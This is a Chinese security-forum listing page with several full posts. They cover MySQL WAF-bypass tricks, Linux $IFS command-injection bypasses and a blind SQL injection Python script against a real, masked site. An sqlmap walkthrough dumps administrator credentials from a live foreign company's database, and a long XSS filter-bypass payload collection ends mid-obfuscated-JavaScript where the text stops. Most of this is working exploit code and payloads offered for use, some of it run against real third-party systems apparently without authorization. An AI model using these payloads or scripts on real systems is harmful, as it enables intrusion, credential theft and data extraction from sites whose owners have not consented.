今日腾讯面试题 求解

wukong 回复了问题 • 8 人关注 • 5 个回复 • 578 次浏览 • 2016-09-11 16:20 • 来自相关话题

美团昨天面试题:给你一个webshell,如何渗透内网,给出详细思路

p1rate 回复了问题 • 9 人关注 • 4 个回复 • 1410 次浏览 • 2016-09-10 16:00 • 来自相关话题

【转载】waf绕过

Web安全渗透糖醋黄瓜 发表了文章 • 5 个评论 • 295 次浏览 • 2016-09-09 19:33 • 来自相关话题

0x01: 神奇的 `  (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`() 
    -> ;  
+----------------------+  
| `version`()          |  
+----------------------+  
| 5.1.50-community-log |  
+----------------------+  
1 row in set (0.00 sec)
一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it; 
+----+  
| id |  
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)
usage : where  id ='0'`'xxxxcomment on.

0x02:神奇的- + .

mysql> select id from qs_admins;  
+----+  
| id | 
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;  
+----------+  
| +id-1+1. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;  
+----------+  
| -id-1+3. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)
(有些人不是一直在说关键字怎么过?过滤一个from ...    就是这样连起来过)

0x03: @

mysql> select@^1.from qs_admins;  
+------|+  
| @^1. |  
+------|+  
| NULL |  
+------|+
这个是bypass  曾经dedeCMS filter .

或者这样也是ok.

0x04:mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;  
+------|+  
| test |  
+------|+  
| -1   |  
+------|+  
1 row in set (0.00 sec)

0x05:/![>5000]/ 新构造  版本号(这个可能有些过时了。)

mysql> /\!40000select\/ id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)
 
大家有时间去试试,我也没试过估计有点用 查看全部
0x01: 神奇的 `  (格式输出表的那个控制符)

过空格和一些正则。

mysql> select`version`() 
    -> ;  
+----------------------+  
| `version`()          |  
+----------------------+  
| 5.1.50-community-log |  
+----------------------+  
1 row in set (0.00 sec)
一个更好玩的技巧,这个`控制符可以当注释符用(限定条件)。

mysql> select id from qs_admins where id=1;`dfff and comment it; 
+----+  
| id |  
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)
usage : where  id ='0'`'xxxxcomment on.

0x02:神奇的- + .

mysql> select id from qs_admins;  
+----+  
| id | 
+----+  
| 1  |  
+----+  
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;  
+----------+  
| +id-1+1. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;  
+----------+  
| -id-1+3. |  
+----------+  
| 1        |  
+----------+  
1 row in set (0.00 sec)
(有些人不是一直在说关键字怎么过?过滤一个from ...    就是这样连起来过)

0x03: @

mysql> select@^1.from qs_admins;  
+------|+  
| @^1. |  
+------|+  
| NULL |  
+------|+
这个是bypass  曾经dedeCMS filter .

或者这样也是ok.

0x04:mysql function() as xxx  也可以不用as 和空格

mysql> select-count(id)test from qs_admins;  
+------|+  
| test |  
+------|+  
| -1   |  
+------|+  
1 row in set (0.00 sec)

0x05:/![>5000]/ 新构造  版本号(这个可能有些过时了。)

mysql> /\!40000select\/ id from qs_admins;  
+----+  
| id |  
+----+  
|  1 |  
+----+  
1 row in set (0.00 sec)
 
大家有时间去试试,我也没试过估计有点用

逛网站的时候碰到这种情况该怎么办?

Kyhvedn 发表了文章 • 5 个评论 • 290 次浏览 • 2016-09-09 15:35 • 来自相关话题

【此图片含有企业敏感链接】已被删除,请打码之后重新上传
明明是某某网站的子链接,却跳转到别的网站。。。
这是url跳转漏洞。

【此图片含有企业敏感链接】已被删除,请打码之后重新上传
目录被爆出来,但是应该还没有完全被黑掉。
爆目录是小事,但是如果网站上放着机密文件或者数据的话,别人会借此机会下载、了解到。

浏览路径可以找到上传文件脚本。




以上是一个上传点
之后的就不用我说了吧=-=
 
还有这不是我做的。。。。
室友聊天的时候发了这个这个网址 就尝试了一下找目录,结果。。。。
无意间的发现,大家可以看看,不要搞事就好_(:з」∠)_估计一两天就修复了。
 
白衣行侠,轻剑快马
  查看全部
【此图片含有企业敏感链接】已被删除,请打码之后重新上传
明明是某某网站的子链接,却跳转到别的网站。。。
这是url跳转漏洞。

【此图片含有企业敏感链接】已被删除,请打码之后重新上传
目录被爆出来,但是应该还没有完全被黑掉。
爆目录是小事,但是如果网站上放着机密文件或者数据的话,别人会借此机会下载、了解到。

浏览路径可以找到上传文件脚本。
74)MLIZLTJ90A}SV}55WIV.png

以上是一个上传点
之后的就不用我说了吧=-=
 
还有这不是我做的。。。。
室友聊天的时候发了这个这个网址 就尝试了一下找目录,结果。。。。
无意间的发现,大家可以看看,不要搞事就好_(:з」∠)_估计一两天就修复了。
 
白衣行侠,轻剑快马
 

Linux下无空格执行命令以及环境变量等问题小折腾

Mosuan 发表了文章 • 3 个评论 • 404 次浏览 • 2016-09-09 15:21 • 来自相关话题

忘了是什么时候了,反正有一天碰到了一个站可以执行命令,但是不能有空格,就开始瞎折腾了...

先在群里问的时候一个平安的大牛说了$IFS,先看看$IFS是什么东西。

IFS:用于设置指定shell域分隔符,默认情况下为空格。

默认情况下是空格...

比如说ls ../命令中间有个空格,这里可以用ls$IFS../

linux系统环境变量,使用set命令查看

 
在某些特殊环境下过滤了某些命令时或许可以用内置环境变量来绕过
比如过滤了whoami的时候你又很想知道当前用户是谁...虽然这种几率为0.000000001,但是既然去折腾这个了就总结一下吧。

可以用USER内置环境变量来查看当前用户
echo $USER

 
$符号在linux中是获取变量的时候,当该变量不存在的时候返回空

某些情况下过滤了某些东西,比如说过滤了$IFS,正则是ls\s../

这个时候想执行该命令可以用shell的$绕过,比如说ls$XXOOSSS ../

 
Ps:有更好的想法可以说说,接受一切对的教育。
  查看全部
忘了是什么时候了,反正有一天碰到了一个站可以执行命令,但是不能有空格,就开始瞎折腾了...

先在群里问的时候一个平安的大牛说了$IFS,先看看$IFS是什么东西。

IFS:用于设置指定shell域分隔符,默认情况下为空格。

默认情况下是空格...

比如说ls ../命令中间有个空格,这里可以用ls$IFS../

linux系统环境变量,使用set命令查看

 
在某些特殊环境下过滤了某些命令时或许可以用内置环境变量来绕过
比如过滤了whoami的时候你又很想知道当前用户是谁...虽然这种几率为0.000000001,但是既然去折腾这个了就总结一下吧。

可以用USER内置环境变量来查看当前用户
echo $USER

 
$符号在linux中是获取变量的时候,当该变量不存在的时候返回空

某些情况下过滤了某些东西,比如说过滤了$IFS,正则是ls\s../

这个时候想执行该命令可以用shell的$绕过,比如说ls$XXOOSSS ../

 
Ps:有更好的想法可以说说,接受一切对的教育。
 

记一次Mysql手工注入(过滤逗号)

Web安全渗透Mosuan 发表了文章 • 9 个评论 • 732 次浏览 • 2016-09-09 15:14 • 来自相关话题

#先感谢下@莲藕炖猪蹄和@redfree。姿势不在多,只要你的姿势正确欢迎来给我普及新知识。绝对虚心求教。

再就是标题党一回,今天碰到一个注入,过滤了逗号,sqlmap并没有跑出来,习惯性装逼手注一下。

过滤逗号的情况下布尔型注入可以用substring这个函数,正常用法substring(@@version,1,1)=5,猜@@version的第一位是5。

但是这里过滤了逗号,前段时间@莲藕炖猪蹄 大牛刚给我普及了一下,substring不用逗号也可以猜解的用法。

substring(database() from 1) 这样是猜解完整的数据库名字。

简单用本地数据库演示下。 
 




一开始length(database())得到9



接下来猜数据库名称 substring(database() from 9) 这样猜解数据库名称最后一个字符并没有猜出最后一位是什么字符…这特么就很尴尬了....刚开始只知道过滤逗号,当时就想到了应该是还过滤了什么关键词....

怎么判断过滤了什么字符?简单判断:length下当前的注入的语句,如果过滤了注入语句中的某个关键词肯定返回false。已知DATA SIZE为3453为True。这里证明没有过滤什么东西...

这个时候@redfree那边说他注入出来了...语法是一样的…我擦....
检查下python代码,redfree说他那边加了headers,如果不加headers就返回False...
这尼玛就很尴尬了...加上headers再跑下...

后面redfree说 注释方式有问题…我擦…以前是个开发狗没用过--注入,我多余的把—后面的%20删了,原来--后面后面是个单引号...也就是说--不是注释了。
查了下mysql手册 注意--注释风格要求你在--以后至少有一个空格!MySQL3.23.3和以上版本支持'--'注释风格,只要注释跟在一个空格之后。

好吧,加上%20果断就跑出来了...其实用%23可以不用加空格...
脚本如下:#-[i]- coding:utf-8 -[/i]-

import requests

payload = list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_')

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,[i]/[/i];q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate"
}

user = ''
num = 9
strings = ''
for x in range(1,10):
for y in payload:
y = y+strings
url = "http://[b][i].[/b][/i].[b].[/b]/**/user/buyerChannel/indexNew?buyer_id=25966%%27)+AND+substring(database()+from+%d)=%%27%s%%27%%23&_=1466596215826" % (num,y)
try:
response = requests.get(url,headers=headers,timeout=5,verify=False)
if response.content.find('****') != -1:#改成你想查找的关键词

strings = y
num -= 1
print url
break
except Exception,e:
pass
print '当前数据库名称为: ',
print strings 查看全部
#先感谢下@莲藕炖猪蹄和@redfree。姿势不在多,只要你的姿势正确欢迎来给我普及新知识。绝对虚心求教。

再就是标题党一回,今天碰到一个注入,过滤了逗号,sqlmap并没有跑出来,习惯性装逼手注一下。

过滤逗号的情况下布尔型注入可以用substring这个函数,正常用法substring(@@version,1,1)=5,猜@@version的第一位是5。

但是这里过滤了逗号,前段时间@莲藕炖猪蹄 大牛刚给我普及了一下,substring不用逗号也可以猜解的用法。

substring(database() from 1) 这样是猜解完整的数据库名字。

简单用本地数据库演示下。
 
 

1.jpg
一开始length(database())得到9

2.png
接下来猜数据库名称 substring(database() from 9) 这样猜解数据库名称最后一个字符
并没有猜出最后一位是什么字符…这特么就很尴尬了....刚开始只知道过滤逗号,当时就想到了应该是还过滤了什么关键词....

怎么判断过滤了什么字符?简单判断:length下当前的注入的语句,如果过滤了注入语句中的某个关键词肯定返回false。
已知DATA SIZE为3453为True。
这里证明没有过滤什么东西...

这个时候@redfree那边说他注入出来了...语法是一样的…我擦....
检查下python代码,redfree说他那边加了headers,如果不加headers就返回False...
这尼玛就很尴尬了...加上headers再跑下...

后面redfree说 注释方式有问题…我擦…以前是个开发狗没用过--注入,我多余的把—后面的%20删了,原来--后面后面是个单引号...也就是说--不是注释了。
查了下mysql手册 注意--注释风格要求你在--以后至少有一个空格!MySQL3.23.3和以上版本支持'--'注释风格,只要注释跟在一个空格之后。

好吧,加上%20果断就跑出来了...其实用%23可以不用加空格...

脚本如下:
#-[i]- coding:utf-8 -[/i]-

import requests

payload = list('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890_')

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,[i]/[/i];q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "gzip, deflate"
}

user = ''
num = 9
strings = ''
for x in range(1,10):
for y in payload:
y = y+strings
url = "http://[b][i].[/b][/i].[b].[/b]/**/user/buyerChannel/indexNew?buyer_id=25966%%27)+AND+substring(database()+from+%d)=%%27%s%%27%%23&_=1466596215826" % (num,y)
try:
response = requests.get(url,headers=headers,timeout=5,verify=False)
if response.content.find('****') != -1:#改成你想查找的关键词

strings = y
num -= 1
print url
break
except Exception,e:
pass
print '当前数据库名称为: ',
print strings

DNS侦查工具 Altdns介绍【原文引自Github】

pygain 发表了文章 • 5 个评论 • 413 次浏览 • 2016-09-09 08:55 • 来自相关话题

Altdns - Subdomain discovery through alterations and permutations

Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.

From these two lists that are provided as input to altdns, the tool then generates a massive output of "altered" or "mutated" potential subdomains that could be present. It saves this output so that it can then be used by your favourite DNS bruteforcing tool.

Alternatively, the -r flag can be passed to altdns so that once this output is generated, the tool can then resolve these subdomains (multi-threaded) and save the results to a file.

Altdns works best with large datasets. Having an initial dataset of 200 or more subdomains should churn out some valid subdomains via the alterations generated.
 
Altdns-一款通过变更和排列进行子域发现的工具
 
Altdns是一款DNS侦察工具,允许对常规子域进行发现。它能够查找出当前域名(eg.test,dev,staging)的子域和你所知道的子域列表进行侦察。
 
将上述两钟列表(当前域和已知子域)做为该工具的输入,它便会在输出上产生大量的突变和改变,这些改变非常有可能是潜在的子域。它节省了大量输出上的资源,使得接下来使用你喜欢的NDS Bruteforcing工具变得更容易。
 
此外,它-r的选项能转送到自己,使得当有一个输出的子域被发现时能够将其保存到一个文件当中。
 
Altdns搭配一个大型的数据组能发挥最好的效果。
当拥有一个达到甚至超过200组数据的数据组作为输入列表的时候,它可以通过突变制造出一些可用的新发现子域。
 
下载链接






安装:pip install -r requiremnets.txt
使用:./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
 
subdomains.txt:包含已知子域的列表
data_output:包含所有突变和重行排列的子域
words.txt:包含着你现在想进行突变的流行的子域以(dev,qa的)为结尾的,一行一个
 
                                               翻译组:pygain




 
 





 
 
 
                                                查看全部
Altdns - Subdomain discovery through alterations and permutations

Altdns is a DNS recon tool that allows for the discovery of subdomains that conform to patterns. Altdns takes in words that could be present in subdomains under a domain (such as test, dev, staging) as well as takes in a list of subdomains that you know of.

From these two lists that are provided as input to altdns, the tool then generates a massive output of "altered" or "mutated" potential subdomains that could be present. It saves this output so that it can then be used by your favourite DNS bruteforcing tool.

Alternatively, the -r flag can be passed to altdns so that once this output is generated, the tool can then resolve these subdomains (multi-threaded) and save the results to a file.

Altdns works best with large datasets. Having an initial dataset of 200 or more subdomains should churn out some valid subdomains via the alterations generated.
 
Altdns-一款通过变更和排列进行子域发现的工具
 
Altdns是一款DNS侦察工具,允许对常规子域进行发现。它能够查找出当前域名(eg.test,dev,staging)的子域和你所知道的子域列表进行侦察。
 
将上述两钟列表(当前域和已知子域)做为该工具的输入,它便会在输出上产生大量的突变和改变,这些改变非常有可能是潜在的子域。它节省了大量输出上的资源,使得接下来使用你喜欢的NDS Bruteforcing工具变得更容易。
 
此外,它-r的选项能转送到自己,使得当有一个输出的子域被发现时能够将其保存到一个文件当中。
 
Altdns搭配一个大型的数据组能发挥最好的效果。
当拥有一个达到甚至超过200组数据的数据组作为输入列表的时候,它可以通过突变制造出一些可用的新发现子域。
 
下载链接

捕获.PNG


安装:pip install -r requiremnets.txt
使用:./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
 
subdomains.txt:包含已知子域的列表
data_output:包含所有突变和重行排列的子域
words.txt:包含着你现在想进行突变的流行的子域以(dev,qa的)为结尾的,一行一个
 
                                               翻译组:pygain
68747470733a2f2f692e696d6775722e636f6d2f666b665a716b6c2e706e67.png

 
 

68747470733a2f2f692e696d6775722e636f6d2f4a7966756532362e706e67.png

 
 
 
                                               

SQL注入渗透测试实例技术分享一枚

pygain 发表了文章 • 9 个评论 • 502 次浏览 • 2016-09-07 22:16 • 来自相关话题

首先不建议读者未经授权进行渗透测试,另即使授权也不允许对数据库里面的具体数据进行读取。因为我们都是新一代的高品质,高可信的安全人员,:)

下面是这个网站的注入点(找了好久,置于如何寻找百度上都是方法,SQL口令测试与软件测试均可)






工具:sqlmap 这是一款功能强大大数据库渗透软件,基于python。所以在运行该软件时先安装python 2.X.X版本(3.x.x无法使用)
sqlmap下载地址:






渗透过程:
1.在命令行模式下找到sqlmap文件夹中的sqlmap.py文件(cd ..退上级目录;cd sqlmap 进入文件夹;dir查看文件信息),在文件夹中运行“python sqlmap.py -h”出现帮助界面说明可以运行(python有的电脑需要打,有的不用)。
如图:






2.测试我们的渗透点是否可用
键入






会出现如下的情况







*在过程中会出现一些询问,如果看不懂不知如何选择的话在键入的结尾 --batch 从下图可以看到,显示出了当前网页id的传值方式为GET type为布尔;







紧接着服务器的操作系统和中间件版本号都显示出来 数据库是Mysql 5.0版本以上







 
3.我们来看看当前注入所涉及的数据库是什么吧
键入 








注意倒数第4行







4.进到数据看看有什么吧
键入 








其实这个软件的界面还是挺清爽的







由于是境外的网站,时间太久了,所以渗透了一会我就让它停止了,出现了库里的表(不算太多)







5.觉得CRM_Manager(客户管理人员)这个表还不错,动手了啊
键入:








出来了一些比较重要的东西






 
6.选择 Email,Name,Password,qq,skype 5个字段进行渗透
键入:






 
耐心等待......








因为是境外企业所以进行的较慢,遗憾的只爆除了管理员的账号和密码(为什么不加密。。。。)
 
到此这个小小的渗透算是结束了。
  查看全部
首先不建议读者未经授权进行渗透测试,另即使授权也不允许对数据库里面的具体数据进行读取。因为我们都是新一代的高品质,高可信的安全人员,:)

下面是这个网站的注入点(找了好久,置于如何寻找百度上都是方法,SQL口令测试与软件测试均可)

QQ截图20160907221024.png


工具:sqlmap 这是一款功能强大大数据库渗透软件,基于python。所以在运行该软件时先安装python 2.X.X版本(3.x.x无法使用)
sqlmap下载地址:

QQ截图20160907221434.png


渗透过程:
1.在命令行模式下找到sqlmap文件夹中的sqlmap.py文件(cd ..退上级目录;cd sqlmap 进入文件夹;dir查看文件信息),在文件夹中运行“python sqlmap.py -h”出现帮助界面说明可以运行(python有的电脑需要打,有的不用)。
如图:

QQ截图20160907212951.png


2.测试我们的渗透点是否可用
键入

QQ截图20160907221032.png


会出现如下的情况


2.png


*在过程中会出现一些询问,如果看不懂不知如何选择的话在键入的结尾 --batch 从下图可以看到,显示出了当前网页id的传值方式为GET type为布尔;


3.png


紧接着服务器的操作系统和中间件版本号都显示出来 数据库是Mysql 5.0版本以上


4.png


 
3.我们来看看当前注入所涉及的数据库是什么吧
键入 


QQ截图20160907221041.png



注意倒数第4行


5.png


4.进到数据看看有什么吧
键入 


QQ截图20160907221050.png



其实这个软件的界面还是挺清爽的


6.png


由于是境外的网站,时间太久了,所以渗透了一会我就让它停止了,出现了库里的表(不算太多)


7.png


5.觉得CRM_Manager(客户管理人员)这个表还不错,动手了啊
键入:


QQ截图20160907221100.png



出来了一些比较重要的东西

8.png


 
6.选择 Email,Name,Password,qq,skype 5个字段进行渗透
键入:

QQ截图20160907221110.png


 
耐心等待......


9.png



因为是境外企业所以进行的较慢,遗憾的只爆除了管理员的账号和密码(为什么不加密。。。。)
 
到此这个小小的渗透算是结束了。
 

Xss Payload收(多场景bypass)

Web安全渗透Mosuan 发表了文章 • 10 个评论 • 867 次浏览 • 2016-09-05 18:35 • 来自相关话题

转自:d3adend.org/xss/ghettoBypass挺全的,我认真了下,还可以。
_____ _ _ _ __ _______ _____ _____ _ _ _ _
| __ \ | | | | | \ \ / / ___/ ___| / __ \ | | | | | | |
| | \/ |__ ___| |_| |_ ___ \ V /\ `--.\ `--. | / \/ |__ ___ __ _| |_ ___| |__ ___ ___| |_
| | __| '_ \ / _ \ __| __|/ _ \ / \ `--. \`--. \ | | | '_ \ / _ \/ _` | __/ __| '_ \ / _ \/ _ \ __|
| |_\ \ | | | __/ |_| |_| (_) | / /^\ |\__/ /\__/ / | \__/\ | | | __/ (_| | |_\__ \ | | | __/ __/ |_
\____/_| |_|\___|\__|\__|\___/ \/ \|____/\____/ \____/_| |_|\___|\__,_|\__|___/_| |_|\___|\___|\__|

A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.

Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = ).

HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>

Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />

Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />

Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />

Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />

Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />

Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />

Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>

Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />

Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>

Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>

Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">

Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>

Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>

Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->

No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <

Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>

Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>

JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>

Encoding Galore.

HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>

URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>

JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>

JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>

JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>

Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
[quote] = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2[/quote]

<img src="1" onnerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

Useless and/or Useful features.

HTML 5 (Not comphrensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

Usuage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />

CSS Comments (IE)
<div style="z:exp/[i]anything[/i]/res/[i]here[/i]/sion(alert(1))" />

Alternate ways of executing JavaScript functions
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>

Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[url=0]alt+lang[/url]>

HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>

HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>

XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>

URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)

http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)

Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>

Non-alphanumeric crazyness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>

<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[